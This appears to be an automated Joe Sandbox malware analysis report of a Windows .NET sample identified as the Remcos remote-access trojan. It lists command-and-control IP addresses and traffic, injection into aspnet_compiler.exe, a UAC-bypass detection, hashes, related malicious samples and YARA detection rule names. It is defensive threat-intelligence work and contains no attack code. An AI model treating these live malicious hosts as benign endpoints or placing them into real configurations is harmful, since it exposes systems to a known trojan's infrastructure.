              http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe | -
              http://geoplugin.net/j | 0% | URL Reputation | safe | -
              http://geoplugin.net/json.gp2C9DCABD6423689A465F00D4F | 0% | Avira URL Cloud | safe | -
              http://geoplugin.net/json.gp1 | 0% | Avira URL Cloud | safe | -
              http://geoplugin.net/json.gprol | 0% | Avira URL Cloud | safe | -
              http://geoplugin.net/json.gpESS | 0% | Avira URL Cloud | safe | -
              http://geoplugin.net/json.gpf | 0% | Avira URL Cloud | safe | -
              127.0.0.1 | 0% | Avira URL Cloud | safe | -
              http://geoplugin.net/json.gpf | 0% | Virustotal | - | Browse
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              geoplugin.net | 178.237.33.50 | true | false | - | unknown
              Name | Malicious | Antivirus Detection | Reputation
              http://geoplugin.net/json.gp | false | URL Reputation: safe; URL Reputation: safe | unknown
              127.0.0.1 | true | Avira URL Cloud: safe | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://geoplugin.net/json.gples8 | aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gprol | aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gp1 | aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gp2C9DCABD6423689A465F00D4F | aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gpf | aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gp/C | file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://geoplugin.net/json.gpESS | aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://geoplugin.net/j | aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
              185.65.134.166 | unknown | Sweden | - | 39351 | ESAB-ASSE | true
              178.237.33.50 | geoplugin.net | Netherlands | - | 8455 | ATOM86-ASATOM86NL | false
              45.128.234.54 | unknown | United Kingdom | - | 208861 | RACKTECHRU | true
              IP
              10.11.0.5
              127.0.0.1
              Joe Sandbox Version:37.1.0 Beryl
              Analysis ID:882705
              Start date and time:2023-06-06 17:16:58 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 9m 50s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:file.exe
              Detection:MAL
              Classification:mal100.troj.spyw.expl.evad.winEXE@9/2@1/5
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:
              • Successful, ratio: 83.7% (good quality ratio 79.2%)
              • Quality average: 83.6%
              • Quality standard deviation: 26.6%
              HCA Information:
              • Successful, ratio: 71%
              • Number of executed functions: 74
              • Number of non-executed functions: 187
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Execution Graph export aborted for target file.exe, PID 3852 because it is empty
              • Report size getting too big, too many NtQueryValueKey calls found.
              No simulations
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              185.65.134.166OHGL8K58GL.exeGet hashmaliciousRemcosBrowse
                skAnwRDuvH.exeGet hashmaliciousRemcosBrowse
                  178.237.33.50file.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  SecuriteInfo.com.Variant.MSILHeracles.84870.1065.31623.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  xkDoqBXNzJWd.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  xIqZWtGFmnyy.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  xjo5OvtmzQLO.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  skihejsene.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  INVOICE.213557783.pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  31883190ELECTRICAL.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  DocumentsDOC03029314B76858448A444B4C03EEC7E6FB5554.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  2023-02-06_09958758993008RC08838_xls.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  file.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  file.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  j8hNdiX5mu.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  Modis_list.xlsGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  w25K2LiB53.rtfGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  RocEMw085M.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  INVOICE.213223421.pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  HKL.vbsGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  Modis_list.docx.docGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  OHGL8K58GL.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  geoplugin.netfile.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.Variant.MSILHeracles.84870.1065.31623.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  xkDoqBXNzJWd.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  xIqZWtGFmnyy.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  xjo5OvtmzQLO.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  skihejsene.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  INVOICE.213557783.pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  31883190ELECTRICAL.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  DocumentsDOC03029314B76858448A444B4C03EEC7E6FB5554.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  2023-02-06_09958758993008RC08838_xls.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  file.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  file.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  j8hNdiX5mu.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Modis_list.xlsGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  w25K2LiB53.rtfGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  RocEMw085M.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  INVOICE.213223421.pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  HKL.vbsGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Modis_list.docx.docGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  OHGL8K58GL.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  ESAB-ASSEOHGL8K58GL.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.166
                  08827299.exeGet hashmaliciousQuasarBrowse
                  • 185.65.134.175
                  skAnwRDuvH.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.166
                  scan_doc_007393033_pdf.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.165
                  scan_Image0820022023-04-22.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.165
                  Halkbank_Ekstre_01.03_(1).exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.167
                  00yK2P5hKs.elfGet hashmaliciousMiraiBrowse
                  • 185.65.133.229
                  562720_docx.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.165
                  INV-0520232.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.165
                  SOA_pdf.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.182
                  dWOq0x5uy7.exeGet hashmaliciousAsyncRATBrowse
                  • 185.213.155.163
                  10029020.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.164
                  SecuriteInfo.com.Trojan.PWS.Siggen3.25377.1163.11838.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.164
                  30e0aa68e3248e80101473ca6f1158dd93b4e1aba1e48.exeGet hashmaliciousRedLineBrowse
                  • 185.65.134.165
                  1.exeGet hashmaliciousBitRATBrowse
                  • 185.65.134.182
                  1.exeGet hashmaliciousBitRATBrowse
                  • 185.65.134.182
                  9WDxWYPBQq.elfGet hashmaliciousMiraiBrowse
                  • 185.65.133.203
                  tempfolder4561.exeGet hashmaliciousNjratBrowse
                  • 193.32.127.236
                  C9A7EE7FB9A3A7E662CB56948774E10995E7C5B465DF4.exeGet hashmaliciousNanocoreBrowse
                  • 185.65.134.179
                  mipselGet hashmaliciousMiraiBrowse
                  • 185.65.133.233
                  No context
                  No context
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:CSV text
                  Category:dropped
                  Size (bytes):226
                  Entropy (8bit):5.354940450065058
                  Encrypted:false
                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                  MD5:B10E37251C5B495643F331DB2EEC3394
                  SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                  SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                  SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):944
                  Entropy (8bit):4.990870805423288
                  Encrypted:false
                  SSDEEP:12:tkEI7nd6CsGkMyGWKyMPVGADRPrmai+H0mGdAPORkoao9W7im51w7CSD9pF6RjSu:qHdRNuKyM8kzst7266m7RJaCo
                  MD5:F415E2ACABAFB737E34EA7C1A7E9AE08
                  SHA1:6CFEF6515535A0D3820C8F9B0C1882DC0D47F808
                  SHA-256:97ABDE670EC722AA8D24DBB5DCA416ECF3AFC766FD627A4831E00E52855435D1
                  SHA-512:B8DDB221554A642E08539C8E63D916773C26D37078AC3B4E3A96CA54C7F4391349FFD069E8B01C820B8E0D7968EE21CAF24AFFD07EA40B208214C68530BEB5E9
                  Malicious:false
                  Preview:{. "geoplugin_request":"102.129.143.77",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Hunenberg",. "geoplugin_region":"Zug",. "geoplugin_regionCode":"ZG",. "geoplugin_regionName":"Zug",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.173",. "geoplugin_longitude":"8.4204",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.9045.}
                  File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.504178499744059
                  TrID:
                  • Win64 Executable GUI Net Framework (217006/5) 49.88%
                  • Win64 Executable GUI (202006/5) 46.43%
                  • Win64 Executable (generic) (12005/4) 2.76%
                  • Generic Win/DOS Executable (2004/3) 0.46%
                  • DOS Executable Generic (2002/1) 0.46%
                  File name:file.exe
                  File size:585216
                  MD5:58a91896eaf6efe03ffe6ebb7b731792
                  SHA1:e3ec7807b22e91e887dd1bc752c426041607216f
                  SHA256:dc984e3a8de291d49bab5940b8f8047d2a7d8f0dab4231342c36edcee9cbb92e
                  SHA512:9c764a0ec4d5f628fe998d90836fe39b2e112ebb21dc97e323c5ef0e50d6790ed36b5d89609c4aa4be2a5aaf6f4859e6e5a70150ce8b446868189417d9dffc23
                  SSDEEP:12288:OBm+u0O5pDETlQ6ocFa59nBTDvdeLu3jaLWGaGAXd:uzAgQ6Y59hDvdeLuTwK
                  TLSH:CEC4BF4A776AD46ED28D673BC6C50814A7A0DD82E30BDB4630C727994D0F3A7DF0929B
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...S.................0.................. ....@...... .......................@............`...@......@............... .....
                  Icon Hash:90cececece8e8eb0
                  Entrypoint:0x400000
                  Entrypoint Section:
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0xEACDEA53 [Sun Oct 31 11:36:51 2094 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:
                  Instruction
                  dec ebp
                  pop edx
                  nop
                  add byte ptr [ebx], al
                  add byte ptr [eax], al
                  add byte ptr [eax+eax], al
                  add byte ptr [eax], al
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x92000 | 0x5a8 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x903f2 | 0x1c | .text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x2000 | 0x8e440 | 0x8e600 | False | 0.7875963701712028 | data | 7.511239938683684 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc | 0x92000 | 0x5a8 | 0x600 | False | 0.419921875 | data | 4.123920436980398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country
                  RT_VERSION | 0x920a0 | 0x31c | data | - | -
                  RT_MANIFEST | 0x923bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | -
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jun 6, 2023 17:18:06.283744097 CEST | 49693 | 55433 | 192.168.2.4 | 185.65.134.166
                  Jun 6, 2023 17:18:09.289627075 CEST | 49693 | 55433 | 192.168.2.4 | 185.65.134.166
                  Jun 6, 2023 17:18:15.290169954 CEST | 49693 | 55433 | 192.168.2.4 | 185.65.134.166
                  Jun 6, 2023 17:18:27.316764116 CEST | 49694 | 55433 | 192.168.2.4 | 10.11.0.5
                  Jun 6, 2023 17:18:30.322700024 CEST | 49694 | 55433 | 192.168.2.4 | 10.11.0.5
                  Jun 6, 2023 17:18:36.354473114 CEST | 49694 | 55433 | 192.168.2.4 | 10.11.0.5
                  Jun 6, 2023 17:18:48.361797094 CEST | 49698 | 55433 | 192.168.2.4 | 45.128.234.54
                  Jun 6, 2023 17:18:48.391845942 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Jun 6, 2023 17:18:48.392015934 CEST | 49698 | 55433 | 192.168.2.4 | 45.128.234.54
                  Jun 6, 2023 17:18:48.413088083 CEST | 49698 | 55433 | 192.168.2.4 | 45.128.234.54
                  Jun 6, 2023 17:18:48.452032089 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Jun 6, 2023 17:18:48.496220112 CEST | 49698 | 55433 | 192.168.2.4 | 45.128.234.54
                  Jun 6, 2023 17:18:48.522089958 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Jun 6, 2023 17:18:48.536987066 CEST | 49698 | 55433 | 192.168.2.4 | 45.128.234.54
                  Jun 6, 2023 17:18:48.625186920 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Jun 6, 2023 17:18:48.625369072 CEST | 49698 | 55433 | 192.168.2.4 | 45.128.234.54
                  Jun 6, 2023 17:18:48.693269014 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Jun 6, 2023 17:18:49.297676086 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Jun 6, 2023 17:18:49.301040888 CEST | 49698 | 55433 | 192.168.2.4 | 45.128.234.54
                  Jun 6, 2023 17:18:49.348654032 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Jun 6, 2023 17:18:49.402436972 CEST | 49698 | 55433 | 192.168.2.4 | 45.128.234.54
                  Jun 6, 2023 17:18:49.540925980 CEST | 49699 | 80 | 192.168.2.4 | 178.237.33.50
                  Jun 6, 2023 17:18:49.565812111 CEST | 80 | 49699 | 178.237.33.50 | 192.168.2.4
                  Jun 6, 2023 17:18:49.565912008 CEST | 49699 | 80 | 192.168.2.4 | 178.237.33.50
                  Jun 6, 2023 17:18:49.566293001 CEST | 49699 | 80 | 192.168.2.4 | 178.237.33.50
                  Jun 6, 2023 17:18:49.598249912 CEST | 80 | 49699 | 178.237.33.50 | 192.168.2.4
                  Jun 6, 2023 17:18:49.598454952 CEST | 49699 | 80 | 192.168.2.4 | 178.237.33.50
                  Jun 6, 2023 17:18:49.665569067 CEST | 49698 | 55433 | 192.168.2.4 | 45.128.234.54
                  Jun 6, 2023 17:18:49.732357979 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Jun 6, 2023 17:18:50.597860098 CEST | 80 | 49699 | 178.237.33.50 | 192.168.2.4
                  Jun 6, 2023 17:18:50.597980022 CEST | 49699 | 80 | 192.168.2.4 | 178.237.33.50
                  Jun 6, 2023 17:19:07.185269117 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Jun 6, 2023 17:19:07.188301086 CEST | 49698 | 55433 | 192.168.2.4 | 45.128.234.54
                  Jun 6, 2023 17:19:07.265501022 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Jun 6, 2023 17:19:37.214919090 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Jun 6, 2023 17:19:37.218048096 CEST | 49698 | 55433 | 192.168.2.4 | 45.128.234.54
                  Jun 6, 2023 17:19:37.287739038 CEST | 55433 | 49698 | 45.128.234.54 | 192.168.2.4
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jun 6, 2023 17:18:49.507006884 CEST | 52239 | 53 | 192.168.2.4 | 8.8.8.8
                  Jun 6, 2023 17:18:49.527475119 CEST | 53 | 52239 | 8.8.8.8 | 192.168.2.4
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Jun 6, 2023 17:18:49.507006884 CEST | 192.168.2.4 | 8.8.8.8 | 0xc59a | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Jun 6, 2023 17:18:49.527475119 CEST | 8.8.8.8 | 192.168.2.4 | 0xc59a | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                  • geoplugin.net
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.449699178.237.33.5080C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampkBytes transferredDirectionData
                  Jun 6, 2023 17:18:49.566293001 CEST42OUTGET /json.gp HTTP/1.1
                  Host: geoplugin.net
                  Cache-Control: no-cache
                  Jun 6, 2023 17:18:49.598249912 CEST44INHTTP/1.1 200 OK
                  date: Tue, 06 Jun 2023 15:18:49 GMT
                  server: Apache
                  content-length: 944
                  content-type: application/json; charset=utf-8
                  cache-control: public, max-age=300
                  access-control-allow-origin: *
                  Data Ascii: { "geoplugin_request":"102.129.143.77", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Hunenberg", "geoplugin_region":"Zug", "geoplugin_regionCode":"ZG", "geoplugin_regionName":"Zug", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.173", "geoplugin_longitude":"8.4204", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9045}


                  Target ID:0
                  Start time:17:17:57
                  Start date:06/06/2023
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\Desktop\file.exe
                  Imagebase:0x177e97b0000
                  File size:585216 bytes
                  MD5 hash:58A91896EAF6EFE03FFE6EBB7B731792
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:low

                  Target ID:1
                  Start time:17:18:04
                  Start date:06/06/2023
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Imagebase:0x60000
                  File size:55400 bytes
                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:2
                  Start time:17:18:04
                  Start date:06/06/2023
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Imagebase:0x250000
                  File size:55400 bytes
                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:3
                  Start time:17:18:04
                  Start date:06/06/2023
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Imagebase:0x420000
                  File size:55400 bytes
                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:4
                  Start time:17:18:04
                  Start date:06/06/2023
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Imagebase:0x890000
                  File size:55400 bytes
                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  Reputation:high

                  Reset < >
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: %$g[s
                    • API String ID: 0-2818602941
                    • Opcode ID: 388d08ca8fbdc16dbe8e49be8904ad53c85c2083cdf4c24348e787b98028f9a5
                    • Instruction ID: 7e07f105fd7f25cdcb0f4d886b2c908dee5c3d24daa55121f9ea9bba769d0a88
                    • Opcode Fuzzy Hash: 388d08ca8fbdc16dbe8e49be8904ad53c85c2083cdf4c24348e787b98028f9a5
                    • Instruction Fuzzy Hash: 41118971D14A1D8FEBA4DB28D899BA9B7B1FB14340F5046FA900DE3252DE345AC5CF41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
